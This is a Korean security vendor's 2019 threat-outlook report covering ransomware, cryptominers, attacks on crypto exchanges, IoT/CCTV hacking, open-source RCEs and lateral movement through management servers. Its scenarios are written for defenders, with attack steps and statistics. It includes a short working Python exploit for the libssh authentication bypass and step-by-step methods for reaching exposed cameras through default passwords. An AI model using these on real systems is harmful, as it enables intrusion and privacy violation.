Security Threat Summary 2019 년에는보안위협대상이확장되고, 다양한공격이결합된형태로발전할것으로예상된다. 랜섬웨어공격이다른종류의악성코드와결합되어 APT 공격형태를띌것으로보이며, 사물인터넷기기 (IoT Device) 가다양해짐에따라악성코드공격또한확대될것

Transcription

1

2 Contents 03 Security Threat Summary 년 5 대보안위협전망 암호화폐를노리는 3대공격키워드, 랜섬웨어 암호화폐채굴 거래소공격산업시설을노리는사물인터넷 (IoT) 해킹공격기업의오픈소스소프트웨어를노린공격대규모공격을위한관리서버장악과이스트웨스트무브먼트 (East-West Movement) 공격 APT공격전개를위한전초전, 이메일공격확대 27 Conclusion 28 About EQST

3 Security Threat Summary 2019 년에는보안위협대상이확장되고, 다양한공격이결합된형태로발전할것으로예상된다. 랜섬웨어공격이다른종류의악성코드와결합되어 APT 공격형태를띌것으로보이며, 사물인터넷기기 (IoT Device) 가다양해짐에따라악성코드공격또한확대될것이다. 공격자들은사용자가관리하지않는영역에대한취약점을이용하여기업의중요정보를탈취할것이며, 기업 IT자산을관리하는서버로침투하여운영자권한을획득하고, 다양한취약점을이용하여목표로하는대상으로접근할것이다. 초기침투시이메일 ( ) 은가장큰보안홀 (Hole) 이될것이며, 공격자들은이메일에대한지속적인공격을시도할것으로예상된다 년 Security Threat 이슈를되돌아보면첫째, 암호화폐에대한공격이지속적으로고도화되었다. 암호화폐에대한공격을살펴보면갠드크랩 (Gandcrab), 크립토월 (Cryptowall), 류크 (Ryuk) 등다양한랜섬웨어 (Ransomware) 공격이다른공격들과결합, 고도화되어지속적으로발생하였다. 특히암호화폐를채굴하는크립토마이너 (Crypto Miner) 를이용해, 사용자 PC 및서버를대상으로채굴 (Mining) 하는악성코드가증가했으며, 웹채굴기반의서비스를악용하는피해사례도다수발생하였다. 지능형지속위협 (APT) 공격으로인한암호화폐거래소공격피해는 2018 년한해동안공개된것만으로도 8,717 억에달한다. 둘째, 사물인터넷악성코드 (IoT Malware) 공격과사물인터넷기기공격을통한사생활유출피해가발생하였다. 사물인터넷기기에대한공격은기기의기본계정 (Default Account) 및패스워드대입공격을통해권한을탈취하고, 대규모봇넷 (Botnet) 을형성해디도스 (DDoS) 공격및사물인터넷기기자체에손상을입히는방식으로이뤄져서비스가불가능하게되었다. 또한, 개인사용자의취약한 CCTV 를해킹하여, 실시간으로웹사이트에유출시키는사건이발생하여사회적으로큰이슈가되기도하였다. EQST insight Annual REPORT 3

4 셋째, 공격자는사용이증가되는오픈소스영역에대한취약점을지속적으로연구하여침투를시도하였다. 보안관리가어려운오픈소스 (Open Source Unmanaged) 의경우스트럿츠 (Struts), 제이보스 (Jboss) 등다양한영역에서취약점이지속해서증가했다. 공격이발생한후뒤늦게패치가발표되어많은기업들이개인정보유출등다양한피해를입었다. 넷째, 관리서버의망분리보안홀및 Agent 취약점기반이스트- 웨스트공격또한증가하였다. 공격자는인터넷망, 운영망을동시에관리하는관리서버를공격하여망분리로차단되어있는네트워크 (Network) 를우회하였다. 또한관리서버취약점뿐만아니라에이전트간의통신 (Agent to Agent) 취약점을이용해공격자는이스트- 웨스트수평이동하여, 목적하는정보를획득하는사고도증가하였다. 마지막으로초기침투를위한다양한이메일공격이증가하였다. 앞서언급한랜섬웨어, 관리서버침투, 암호화폐거래소공격에서도초기 (Initial) 공격의대부분은이메일공격이었다. 이메일공격은최근일반적인피싱이메일과달리기업과기관의담당자를사칭하거나업무관련내용을보내는등치밀하고지능화된수법을사용함으로써피해건수가지속적으로증가하고있다 4 EQST insight Annual REPORT

5 2019 년 5 대보안위협전망 암호화폐를노리는 3 대공격키워드, 랜섬웨어암호화폐채굴거래소공격 APT 공격전개를위한전초전, 이메일공격확대 산업시설을노리는사물인터넷 (IoT) 해킹공격 대규모공격을위한관리서버장악과이스트웨스트무브먼트공격 기업의오픈소스소프트웨어를노린공격 1. 암호화폐를노리는 3 대공격키워드, 랜섬웨어 암호화폐채굴 거래소공격 랜섬웨어공격, 암호화폐채굴 (Coin Miner), 암호화폐거래소에대한공격등 2018년의주요이슈였던암호화폐공격이지속되고복합적인공격으로발전하게될것으로전망된다. 암호화폐공격중에서랜섬웨어는보안솔루션을우회하기위해지속적으로업그레이드를할것으로예상되며, 랜섬웨어와다른악성코드및공격기법과결합해보다복합적인형태로발전할것으로보인다. 채굴 (Miner) 형악성코드도취약점과결합된형태로진화할것이며, 사물인터넷 (IoT) 기기를공격하여대상영역또한확대될것이다. 해커들역시보다많은금액을한번에획득하기위해암호화폐거래소에대한공격을멈추지않을것이며, 공격시지능적지속위협 (APT) 공격을통해암호화폐서버 (Coin Server) 에접근 EQST insight Annual REPORT 5

6 하여암호화폐를탈취할것으로예상된다. 랜섬웨어및암호화폐채굴의경우에는클라우드 (Cloud) 의구조적인취약점을이용하여대규모전파에대한시도를할것으로예상된다. 2019년에는지금보다많은기업들이클라우드전환을고려하고있어, 랜섬웨어및암호화폐채굴위협에대한대응방안에대해서고려해야할것이다. SK인포섹에서 18년발생한암호화폐에대한공격통계및실제해킹사고조사한사례, 보안관제및 Intelligence에서탐지된결과는다음과같다. 다양한종류의랜섬웨어공격 ( 단위 : 천건 ) 4,500 4,000 4,338 3,500 3,000 3,000 2,500 2,000 1,500 1, GandCrab 1,086 TeslaCrypt 717 Cerber Wcry Cryptowall Locky TroldeshA TorrentLocker Nemesis CTB-Locker [ Secudium 관제데이터로보는 2018 년랜섬웨어탐지통계 ] SK인포섹의시큐디움 (Secudium) 관제데이터를분석한결과, 2018년다양한종류의랜섬웨어공격이이루어졌다. 그중갠드크랩랜섬웨어가 438만건으로가장많은공격이벤트가발생하였다. 또한테슬라크립트 (TeslaCrypt), 케르베르 (Cerber), 워너크라이 (Wcry) 랜섬웨어 (Ransomware) 순으로공격이벤트가많이발생한것을확인할수있었다. 특히 2018년초부터등장하여세계적으로큰피해를입히고있는갠드크랩랜섬웨어는현재 v5.x 버전까지업그레이드된것으로확인되고있다. 다행히최근사법기관에서해커조직서버압수를통해암호화키를입수한것으로보이며, 얼마전갠드크랩랜섬웨어는암호화된파일중일부를복구할수있는무료복구툴이공개되기도하였다. 하지만갠드크랩은 2018년해커에의해가장많이사용된랜섬웨어의한종류이기도하고, 추가적인변종들의출현으로모든감염파일을복호화할수없기때문에그위험성이여전히높아주의가요구된다. 6 EQST insight Annual REPORT

7 ( 단위 : 천건 ) 1,200 1, 월 2 월 3 월 4 월 5 월 6 월 7 월 8 월 9 월 10 월 11 월 GandCrab TeslaCrypt Cerber Wcry Cryptowall TroldeshA Locky TorrentLocker Nemesis CTB-Locker [ Secudium 관제데이터로보는 2018 년랜섬웨어월별탐지통계 ] 랜섬웨어월별공격탐지데이터를분석한결과, 상반기 2월경테슬라크립트가 60만여건으로가장많은이벤트탐지건수를보였다. 하반기 6월경에는갠드크랩랜섬웨어가가장많은 100만여건의이벤트탐지건수를보였다. 2015년최초등장한테슬라크립트는현재 v4.x까지변종이출현했으며, 테슬라크립트 v4.x는플래시플레이어 (Flash Player) 취약점 (CVE ) 과구버전의인터넷익스플로러 (IE) 브라우저취약점을이용해감염시키는방식을주로사용하였다. 갠드크랩랜섬웨어의경우는 2018년 4월 v2.1, 5월 v3, 7월 v4, 9월 v5가등장하는등지속적인변종을통하여감염을유도하고있는것으로나타났다. EQST insight Annual REPORT 7

8 공격대상서버확대 Emotet O 악성매크로 1 Emote 악성코드 Internet C2서버 3 Trickbot 다운로드 OA 망 운영망 5 거점확보 2 Emote 악성코드실행 4 Trickbot 자기전파 Ransomware 배포 자기전파 원격관리서버 6 Ransomware 감염 공격자는최초공격타깃사용자의이메일주소를수집한후, 업무와연관되거나개인적으로관심있을만한내용에악성매크로 (Macro, 이모텟 (Emotet) 악성코드 ) 가포함된워드문서를첨부하여정교하게위장해메일을발송하였다. 이후메일을수신한담당자가첨부파일을클릭하면, 이모텟악성코드가실행되어내부기밀정보를 C2서버로송신하고, 추가적인명령으로트릭봇 (Trickbot) 악성코드를받아실행되게된다. 트릭봇악성코드는크게실행부인 익스큐터 (Executor) 와전파부인 스프레더 (Spreader) 로나누어져각역할을수행한다. 익스큐터는개인및금융정보탈취를수행하며, 스프레더는내부스캐닝및공유폴더취약점을이용하여특정악성코드를배포하는역할을수행한다. 공격자는이런트릭봇의기능을통하여 OA망과운영망을추가적으로전파하여감염시킨후, 원격관리서버를확보하고, 파일배포 / 실행기능을통해특정시스템에랜섬웨어를감염시킨다. 랜섬웨어에감염된시스템은파일이암호화되고, 이로인해시스템장애가발생하여외부서비스가불가능해지면, 공격자는랜섬웨어노트를통해암호화폐를요구하게된다. Tactics Technics Procedures 암호화폐획득 1 이메일공격기법 ( 이모텟악성코드사용 ) 2 트릭봇악성코드 3 네트워크스캐닝및기본공유폴더취약점 1 타깃기업 PC 권한획득 2 OA/ 운영망동일네트워크감염전파 3 원격관리서버거점확보 4 운영망타깃시스템랜섬웨어유포 [ 공격대상서버확대 ] 8 EQST insight Annual REPORT

9 멀버타이징 (Malvertising) 공격과결합한랜섬웨어 7 랜섬웨어자료복구위해비트코인요구 1 해킹공격 ( 랜섬웨어업로드 ) Malware Repository Malware Repository 6 랜섬웨어다운로드 암포화폐획득 2 해킹공격 ( 악성도메인삽입 ) Internet 온라인광고사이트 멀버타이징기법 www 3 뉴스 / 포털사이트배너및팝업게시 www Gandcrab 랜섬웨어 Exploit Kit 온라인광고매체 www Gandcrab 랜섬웨어 5 랜섬웨어다운로드사이트 Redirect 4 사이트접속및클릭 일반사용자 Advertising Server 공격자는 1차적으로보안이취약한웹사이트를해킹한뒤, 익스플로잇킷 (Exploit Kit) 및갠드크랩랜섬웨어를업로드하여악성코드배포지를확보한다. 이후공격자는온라인광고사이트를해킹후, 광고내에악성 URL 링크를삽입한다. 악성 URL이삽입된광고는온라인광고매체 ( 뉴스 / 포털 ) 등의배너및팝업으로게시되게된다. 이후일반사용자가해당악성광고가포함된온라인광고매체웹사이트에접속후감염조건을만족 ( 취약점존재 ) 시킬경우, 갠드크랩랜섬웨어를다운로드받아실행하고, 사용자의시스템을암호화한다. 이후에는 CRAB-DECRYPT 라는랜섬노트파일을생성하며, 해커암호화폐주소를포함한특정금액의암호화폐를사용자에게요구한다. 이런종류의공격을멀버타이징 (Malvertising) 공격기법이라부르며멀웨어 (Malware) 와광고 (Advertising) 가결합된합성어로 악성광고 라는뜻을갖고있다. 온라인광고서버를해킹하여불특정다수의사용자를대상으로행해지는공격기법으로위험성이높아주의가필요하다. Tactics Technics Procedures 암호화폐획득 1 멀버타이징공격기법 2 익스플로잇킷악성코드활용 3 갠드크랩랜섬웨어악성코드활용 1 익스플로잇킷, 갠드크랩악성코드배포지구축 2 온라인광고사이트해킹후악성도메인삽입 3 일반사용자온라인광고매체접속시취약점을이용갠드크랩랜섬웨어설치 [ 멀버타이징공격기법과결합한랜섬웨어공격 TTP ] EQST insight Annual REPORT 9

10 익스플로잇툴킷 (Exploit Toolkit) 을이용한채굴 (Miner) 악성코드공격 ( 단위 : 천건 ) CVE 취약점발표 Windows VBScript Engine Remote Code Execution Vulnerability 월 2월 3월 4월 5월 6월 7월 8월 9월 10월 11월 [ Secudium 관제데이터로보는 2018 년 Miner 월별탐지통계 ] 랜섬웨어월별공격탐지데이터를분석한결과, 암호화폐를노린채굴공격은 4월과 5월에특히집중적으로많이발생한것으로파악되었다. 4월에는 35만여건, 5월에는무려 66만여건으로 2달에걸쳐 120만여건의 Miner 공격이이루어졌다. 해당기간에제로데이취약점 (CVE ) 이발표되었고해당취약점은웹기반툴킷인리그 (RIG) 익스플로잇키트에반영되어, 패치를수행하지않은불특정다수사용자의시스템을감염시켰던것으로파악된다. 10 EQST insight Annual REPORT

11 서버메시지블록 (SMB) 취약점을이용한채굴전파공격 1 Web Exploit 악성코드저장소 - ID/PW Hacking Tool, 채굴악성코드 중요정보획득 2 권한탈취 Vaccine 무력화 IDC www 3 악성코드다운로드 PowerShell 이용한파일다운로드 개인 Wallet Wallet 4 감염전파시도 감염전파시도로직 - 계정탈취해킹 Tool을이용하여주변서버 1차공격 - SMB취약점 EternalBlue을이용하여주변서버 2차공격 - 채굴악성코드 WannaMine 설치 5 악성코드증식 공격자는타깃서버중외부에오픈되어있는 Web 서버를식별하고, 스캐닝공격을통해취약점을찾아내어익스플로잇수행후시스템권한탈취및백신을무력화시킨다. 이후파워쉘을이용하여악성코드저장소에서악성코드를추가적으로다운로드받아실행한다. 다운로드악성코드기능을살펴보면, 1차적으로계정탈취해킹 Tool( 미미카츠 (mimikatz)) 을통해해당시스템내에존재하는계정, 패스워드를획득하고, 획득한정보를바탕으로 C클래스네트워크대역에동일악성코드를전파한다. 만약이때계정 / 패스워드가일치하지않을경우, 2차적으로서버메시지블록 (SMB) 취약점 ( 이터널블루 (EternalBlue)) 을이용하여악성코드전파를시도한다. 1, 2차취약점을이용하여추가악성코드가설치된서버에는최종적으로는워너마인 (WannaMine) 채굴형악성코드가설치되어높은 CPU 자원을소모하게되고, 채굴된암호화폐는공격자의암호화폐주소로송신되게된다. 해당공격은특정시스템한대만감염되어도, 순식간에내부네트워크에전파된다는점에서그위험성이상당히높아해당공격에대한철저한대비가요구된다. Tactics Technics Procedures 암호화폐획득 1 웹익스플로잇 (Web Exploit) 공격기법 2 백신무력화, 파워쉘악성코드활용 3 로컬시스템계정, 패스워드해킹 Tool 활용 4 네트워크기본공유 / 이터널블루 (EternalBlue) 취약점활용 5 동일네트워크전파기능탑재 1 외부오픈 Web 서버익스플로잇 / 권한상승 2 동일네트워크악성코드전파 3 워너마인채굴악성코드설치 [ SMB 취약점을이용한채굴전파공격 TTP ] EQST insight Annual REPORT 11

12 2018 년암호화폐거래소공격과피해 시기 국가거래소피해규모 1 월 26 일 일본 코인체크 5,659 억암호화폐도난 2 월 11 일 이탈리아 비트그레일 1,800 억암호화폐도난 6 월 10 일 한국 코인레일 400 억암호화폐도난 6 월 20 일 한국 빗썸 189 억암호화폐도난 9 월 14 일 일본 자이프 669 억암호화폐도난 [ 2018 년암호화폐거래소공격에따른피해규모 ] 2018년한해동안암호화폐거래소를대상으로한해킹공격이전세계적으로 7건이발생하였고, 이로인해무려총 8,717억원상당의암호화폐가공격자에의해도난당했다. 한국에서발생된피해를살펴보면, 6월달에만 10일간격으로 2건 ( 코인레일, 빗썸 ) 의암호화폐거래소를타깃으로한암호화폐도난사고가발생하였으며, 그피해규모는 589억에달한다. 해커의최고의먹잇감, 암호화폐거래소핫월렛암호화폐 8 현금인출 5 핫월렛정보 ( 주소, Keystore) 거래소내부망 7 제 3 의환전소현금전환 6 제 3 의거래소암호화폐세탁 환전 암호화폐세탁 담당자 PC 3 악성코드설치 2 권한탈취 4 권한탈취 거래소서버망 제 3 의환전소 제 3 의거래소 핫월렛정보 / 금전획득 거래소서버망 Coin Server 다중환전 - 해외환전소이용 - 추적불가국가 다중거래소세탁 - 해외거래소이용 - 추적불가국가 1 담당자 PC 해킹 - 악성코드 - 원격프로그램 거래소서버망해킹 - Web Exploit - 관리서버취약점 운영서버 3 악성코드설치 Coin 탈취 - 핫월렛 Coin 탈취 - 주소, KeyStore 12 EQST insight Annual REPORT

13 공격자는거래소의암호화폐를탈취하기위해최초공격시크게 2개의공격루트를활용하였다. 첫번째공격루트는내부망담당자 PC에악성코드가첨부된이메일악성코드를첨부하여감염시키거나, 원격프로그램의취약점을이용하여내부거점을확보하는방법이다. 두번째공격루트는외부에오픈된서버망어플리케이션및관리서버의취약점을이용하여익스플로잇 (Exploit) 하고권한을탈취하여서버망거점을확보하는방법이다. 거점을확보힌후, 추가적인악성코드를설치하여 C2를통해제어하고탈취한권한을이용해암호화폐서버 (Coin Server) 로로그인하여사용자의핫월렛정보 ( 주소, Keystore 등 ) 를압축및분할하여외부로유출한다. 핫월렛을보유한공격자는다크웹 (DarkWeb) 을통해입수한제 3의거래소와환전소에서여러차례암호화폐세탁및환전을통해서최종적으로현금을인출한다. Tactics Technics Procedures 암호화폐획득 1 이메일악성코드링크및파일첨부 2 원격프로그램 /Web 어플리케이션 / 관리서버익스플로잇 1 담당자 PC 및서버망운영서버최초거점확보 2 권한을탈취하여암호화폐서버접근및사용자핫월렛정보확인 3 사용자핫월렛정보유출 4 제 3 의거래소다중암호화폐세탁 5 제 2 의환전소다중환전및현금인출 [ 해커의최고의먹잇감, 암호화폐거래소핫월렛암호화폐공격 TTP ] EQST insight Annual REPORT 13

14 2. 산업시설을노리는사물인터넷 (IoT) 해킹공격 사물인터넷기기를대상으로하는공격이 Industry 4.0에해당되는다양한영역으로확대될것으로전망된다. 류크랜섬웨어를보면기업의생산설비에대한공격을감행한뒤암호화폐를요구하였고기업의입장에서는공장 (Factory) 생산중단시그피해액이수천억규모가되기때문에해커가요구하는암호화폐를지불하지않을수없었다. 이런이유로해커들은앞으로도사물인터넷기기에대한공격영역을확대하여진행할것으로예상되며, 매우다양한영역에대한해킹시도를할것으로보인다. 18년발생한사물인터넷기기 (IoT Device) 에대한주요공격통계및발생한사고는다음과같다. 사물인터넷봇넷멀웨어 (IoT Botnet Malware) ( 단위 : 천건 ) Satori Botnet 취약점 월 2 월 3 월 4 월 5 월 6 월 7 월 8 월 9 월 10 월 11 월 Target Port % % 23(TELNET) 22% 22(SSH) 11% Other 5% IoT Malware Satori 53% Mirai 26% Hajime 6% Amnesia 6% Bricker 6% Other 3% 2018년에발생한사물인터넷공격의 80% 는사토리 (Satori) 와미라이 (Mirai) 악성코드에의한공격이벤트이다. 이중특이한점은 8월에급증한사토리봇넷 (Satori Botnet) 공격이올한해공격의약 40% 를차지한다는것이다. 이를좀더자세히살펴보면, 공격에시도된취약점은 2016년에공개된국내 A 社의 RCE( 원격명령실행가능 ) 취약점으로, 현재까지도제조사는패치하지않고있다. 그리고 2018년 8월에 PoC가발표되자마자약 1달간이를악용한공격이지속적으로발생하였다. 사토리봇넷은변종을만들면서대만 L 社와중국 H 社공유기에공격을시도해 2주간 10만대를감염시켰다. 사물인터넷기기는 Industry 4.0 시대에맞춰사용되는대상영역과수가기하급수적으로늘고있어이런공격들은더욱증가할전망이다. 14 EQST insight Annual REPORT

15 사물인터넷멀웨어 (IoT Malware) 공격 [Satori Botnet] CVE L 사 router 취약점공격 Shodan Search by robot code, IP SCAN, Open AP L 사 /D 사 router Satori Botnet 감염 [Vulnerable CCTV Page] Admin Page Default ID/PW Access Webcam Control CCTV 저장파일획득 각제조사의무선공유기를연이어침입했던사토리 (Satori) 봇넷활동재개 - 패치안된한국공유기의 RCE 취약점공격을통한대량감염 [2018 년 ] - 2 월 : D 사공유기 4 만여대해킹 - 5 월 : D 사공유기 24 만여대해킹 - 6 월 : X 사와 D 사의공유기감염 6 월에만최소 2 번의 DDos 공격을감행 IP CCTV 해킹을통한사생활침해 - IP 카메라에무단접속해영상을불법촬영하고유포 - 대부분이비밀번호미설정및제품제조당시설정된초기비밀번호유출로발생 - 불법으로영상이중계되는해외사이트 (1~9 월 5232 건유출 ) [ IoT 공격시나리오 ] [ 피해사례 ] 관련해킹시연영상 : 미라이변종인사토리봇넷은 2017년 11월최초발견되었다. 그리고같은해 12월, 2주만에사토리봇넷이감염시킨 10만대의사물인터넷장치중약 9만대가중국 H 社의가정용공유기였다. 2018년 2월에는국내 D 社가정용공유기취약점을이용해 4만여대의장치를해킹하였고, 뒤이어 5월에는국내 D 社공유기의취약점 2종이최소 24만대이상의공유기를감염시켰다. 개인CCTV 해킹으로인한사생활침해가심각해지면서과학기술정보통신부는해외사이트를통해불법으로영상이중계되고있는 CCTV 소유자를대상으로영상노출사실및조치방안을이용자에게통지하였다. 통지건수는올 1~9월사이에 5,232건에달했다. CCTV에무단접속해영상을불법촬영 유포하는사례의대부분이기기의비밀번호가설정되어있지않거나, 제조사의기본비밀번호로설정되어있어, 공격자가쉽게관리자페이지로접속및조작하여개인영상을유출할수있었다. EQST insight Annual REPORT 15

16 검색엔진에노출된사물인터넷기기 (IoT Device) 1 공격타겟선정 Insecam GHDB & Shodan Search by robot code ex) linux+upnp+avtech( 제조사명 ) 2 Webcam Control Control Vulnerability Page 3 Webcam Control Admin Page Default ID/PW Access Anybody 관련해킹시연영상 : 러시아웹사이트인세캠은 로봇코드 를이용하여전세계의 CCTV 정보를노출하였다. 그리고, 구글이나쇼단과같은검색엔진을통해서버명과 CCTV 업체명을무작위검색을하여 CCTV 데이터를수집하여목록화한후, 국가별조회및원하는대상의 CCTV 관리자페이지로손쉽게접근한다. 관리자페이지의아이디및패스워드가기본값으로설정되어있어, 웹캠화면접속및조작이가능하게된다. 쇼단을이용한정보검색예 : ) 사물인터넷기기취약점스캔 (Scan) 2 Webcam Control Webcam detect Control 3 Webcam Control Webcam Default ID/PW Access 16 EQST insight Annual REPORT

17 랜덤 (Random) 한 IP 대역을스캔 (Scan) 하여웹으로노출된 CCTV 제조사명을확인및추측하여관 리자페이지에직접접근한후해당기기의디폴트아이디, 패스워드사용및무작위대입을통해관 리자권한으로로그인하여 CCTV 를조작한다. 취약한 AP 해킹 1 공격타겟선정 Open AP 2 Download CCTV File Router Default ID/PW Access 3 CCTV 파일획득 Nmap Scanning Telnet Default ID/PW Access 관련해킹시연영상 : 아이디, 패스워드기본설정값을변경하지않은공개 AP에접근후 CCTV에할당된 IP 목록을확인한다. 해당 IP 정보를토대로포트스캔을하여열린포트를확인한후텔넷 (telnet) 에접근을한다. 텔넷접근후 CCTV 파일이저장된경로를획득하여, 해당경로를통해서버에저장된 CCTV 영상을재생및노출시킬수있다. EQST insight Annual REPORT 17

18 CCTV 포탈사이트 [ CCTV 유출리스트 ] [ CCTV 실시간중계사이트 ] 구글, 바이두등포탈의검색기능을이용해서도노출된 CCTV리스트등을손쉽게획득할수있으며익명게시판, 중국웹캠 (webcam) 관련사이트, in***am등에서는해킹된 CCTV리스트와함께아이디, 패스워드정보를함께제공되고있다. 개인의사생활정보가그대로노출되어있어이를악용하는범죄로이어질수있다. IP 카메라, CCTV 등영상정보처리기기사용시최초비밀번호설정또는변경을의무화해야하고, 영상정보처리기기제조 판매 수입업체는초기비밀번호를기기마다다르게설정하거나, 이용자가초기비밀번호를변경해야만동작하는기능을기기에탑재하여야한다. 또한 IP CCTV 및 AP 기기에대한정기적인펌웨어업데이트도진행해야한다. 18 EQST insight Annual REPORT

19 3. 기업의오픈소스소프트웨어를노린공격 기업에서의오픈소스 (Open Source) 의활용범위는빅데이터 (Big Data), 클라우드등다양한영역으로확장되고있으며, 그사용량또한크게증가하고있다. 이에따라공격자의오픈소스취약점연구도지속되어취약점또한동시에증가하고있다. 만약, 빅데이터및클라우드의관리용오픈소스에대한취약점을이용한해킹사고가발생한다면, 전체서버가공격자에의해제어될수있기때문에대규모의피해가발생할수있다. 따라서오픈소스에대한기본적인설정, 접근통제, 권한부분에대한보안을반드시적용해야만한다. 18년발생한오픈소스소프트웨어 (OSS) 취약점통계및주요사고사례는다음과같다. 오픈소스소프트웨어 (OSS) 보안취약점통계 상 중 하 LibSSH SonarG Glassfish Apache Struts2 Apache TomEE Jetty Apache Tomcat CouchDB Neo4j MaxDB SQLite FireBrid GlusterFS Rabbit MQ Openstack Redis PostgreSQL MongoDB Storm Apache Kafka Impala Apache Hbase Apache Hive Hadoop Docker Elasticsearch Nginx Wildfly Node.js 고위험도 권한통제 : 인증및계정에대한권한통제, 실행권한통제 환경설정 : 제품환경설정수정필요 로깅설정 : User 행위및작업 History 계정및 Password 관리 : Default 계정및 Null Password 암호화 : 암호화통신및 Data 암호화 보안패치 : 취약 Version 패치필요 EQST insight Annual REPORT 19

20 2018년에는오픈소스소프트웨어공격항목중권한통제, 보안설정및관리, 암호화, 보안패치가고위험도로확인되었다. 사용도가높은 Web과 DB, 개발플랫폼에서공격방법이다수존재하고있고, 소스코드가공개되어있는오픈소스소프트웨어특성상공격자입장에서공격대상선정및역분석 (Reversing) 이매우용이하기때문에 2019년에도여전히오픈소스소프트웨어보안위협은지속될전망이다. 오픈소스소프트웨어취약점을해결하기위해서는관리자의보안관리가무엇보다중요하고, 공개취약점 DB, 오픈소스소프트웨어식별및사용명세서생성도구등을활용하여야한다. 더나아가장기적관점으로는보안전문인력과함께오픈소스소프트웨어에대한조직전체의인식변화, 오픈소스소프트웨어거버넌스및컴플라이언스체계수립을위해노력해야할것이다. 웹애플리케이션오픈소스소프트웨어 (Web App OSS) 를대상으로한해킹공격 IDC 중요정보및암호화폐획득 Drupal CVE (RCE) CVE (RCE) 원격코드실행 Drupal 설치서버 서버장악 추가악성코드설치 IDC 중요정보및암호화폐획득 Jboss CVE (RCE) CVE (Upload) 원격코드실행 Jboss 설치서버 서버장악 Miner 설치 IDC 중요정보및암호화폐획득 Struts CVE (RCE) 원격코드실행 Struts 설치서버 서버장악 개인정보유출 2018년오픈소스소프트웨어보안사고는드루팔 (Drupal), 제이보스 (Jboss), 스트럿츠 (Sturts) 에서가장많이발생하였다. 공격자는해킹목표타깃시스템에스캐닝공격을통해버전을확인하고, 해당버전에맞는원격코드실행취약점익스플로잇후, 운영서버로권한상승및서버를장악한다. 서버장악후에는추가악성코드를이용하여내부전파를시도하거나, 채굴형 (Miner) 악성코드를설치및개인정보를유출하는행위를수행한다. 20 EQST insight Annual REPORT

21 Tactics Technics Procedures 암호화폐및개인정보획득 1 오픈소스소프트웨어기존및신규원격코드실행취약점익스플로잇 (Exploit) 1 해킹목표타깃시스템스캐닝공격수행 2 오픈소스소프트웨어원격코드실행취약점 Ex [ 웹애플리케이션오픈소스소프트웨어 (Web App OSS) 대상으로한해킹공격 TTP ] 보안셸 (Secure Shell, SSH) 구현라이브러리 Libssh 취약점을이용한해킹공격 1 공격타겟선정 Shodan 2 libssh 취약공격대상에 SSH 접속시도 Victim Server SYSTEM libssh Scanner 3 서버는클라이언트의인증요청메시지대기 SSH2_MSG_USERAUTH_REQUEST 대기 Shodan - libssh 사용서버목록 Nmap Scanning 4 CVE 취약점을이용한인증우회 SSH2_MSG_USERAUTH_SUCCESS 전송 5 비밀번호를입력하는로그인과정없이인증성공 Root 권한획득 R W X R W X DB R W X R W X Python Exploit Sample Code s = socket.socket() s.connect(( 대상 IP 주소, 포트 )) m = paramiko.message.message() t = paramiko.transport.transport(s) t.start_client() m.add_byte(paramiko.common.cms G_USERAUTH_SUCCESS) t._send_message(m) c = t.open_session(timeout=5) c.exec_command( 실행시킬커맨드 ) out = c.makefile( rb,2048) output = out.read() out.close() print (output) 관련해킹시연영상 : 년오픈소스취약점중보안셸 (Secure Shell, SSH) 구현라이브러리인 Libssh에서심각한취약점이발견되었다. 해당취약점은패스워드없이인증을우회하여취약한서버에대한권한을획득할수있다. 공격자 ( 클라이언트 ) 가 "SSH2_MSG_USERAUTH_SUCCESS" 응답을 Libssh에보내는경우, 인증확인이정상적으로이루어진것으로간주하고패스워드입력없이공격자에게서버접근권한을부여한다. 해당취약점해결을위해서는제조사홈페이지를참고하여최신버전으로보안업데이트를해야한다. Libssh 팀은 0.8.4와 버전업데이트로문제를해결했으며, 동시에이취약점의세부정보도발표하였다. 웹사이트에 Libssh가설치되어있고, 이서버컴포넌트를주로사용하는경우업데이트버전을설치할것을권장한다. EQST insight Annual REPORT 21

22 4. 대규모공격을위한관리서버장악과이스트웨스트무브먼트 (East-West Movement) 공격 2011년부터해커들은관리서버에대한제로데이 (Zero Day) 취약점을이용해대규모공격및내부망침투를하고있고관리서버의통신, 파일배포등악용할수있는기능을지속해서사용하여공격하고있다. 최근보안취약점신고포상제 (Bug Bounty) 를통해관리서버에대한취약점을확인한결과, 여전히기본적인보안이적용되지않아공격자가단기간내에관리서버에대한취약점을찾아낼수있을것으로판단된다. 단순하게관리서버의파일배포기능을통해악성코드만을배포하는것이아니라, 에이전트간의통신 (Agent to Agent) 취약점을통해내부망수평이동에도적극적으로취약점을사용할것이다. 또한관리서버에대한취약점은암호화폐거래소공격, 랜섬웨어에결합등복합적인공격및다양한경로에대한침투를위해사용될것이다. 대규모 PC 및서버를관리하기위한소프트웨어 (S/W) 는운영효율, 관리통합을위해반드시필요하기때문에, 보다강력한보안정책을적용해야할것이다. 18년발생한관리서버망분리홀 (Hole) 및 Agent취약점으로인한사고사례는다음과같다. 관리서버의망분리홀 중요정보획득 1 통한악성코드전파 인터넷망 운영망 IDC 8 자료전송 외부업체사용자 2 망분리홀존재 Gateway 3 웹쉘공격 관리 Srv 7 SSH 접근접근통제 Srv DB Server 4 정상 Agent 위장악성코드전파 6 SSH 접근 업무망 PC 악성코드감염 5 접근통제운영자식별 22 EQST insight Annual REPORT

23 인터넷망과운영망을관리하는서버의망분리보안홀에대한취약점을이용하여망분리를우회하는공격이발생하였다. 공격자는최초다양한방법을통해인터넷망의운영자 PC에악성코드를설치한다. 망분리가적용되어있는업무망 PC로접근하기위해양쪽망을모두운영하고있는관리서버에대한취약점을이용해관리서버로침투한다. 관리서버침투이후, 업무망 PC에악성코드를추가적으로설치하고, 해당악성코드를제어하여타깃하는서버로접근하여정보를유출한다. 에이전트 (Agent) 취약점기반이스트 - 웨스트공격 3 Agent 취약점연구 Agent 취약점연구 - 원격실행코드분석 - 파일업로드 & 실행테스트 1 내부 PC 장악 내부망 2 관리서버장악 서버망 중요정보획득 내부사용자 Agent 관리서버 6 개인정보및기업정보유출 4 Agent 취약점이용악성코드전파 내부 & 서버망 5 Agent East, Wast 공격악성코드전파 관리서버의에이전트는해당 PC를관리하기위해통신, 파일배포, 명령어전송등다양한기능을사용하고있다. 1차악성코드로관리서버를장악하고악성코드를내부망PC에설치한후, 다른 PC 에설치된에이전트의취약점을이용해수평이동공격을진행한다. 에이전트취약점을이용하여이스트 (East), 웨스트 (West) 방향으로수평이동하면서, 타깃으로하는대상을발견하고최종원하는정보를획득하는공격을수행한다. EQST insight Annual REPORT 23

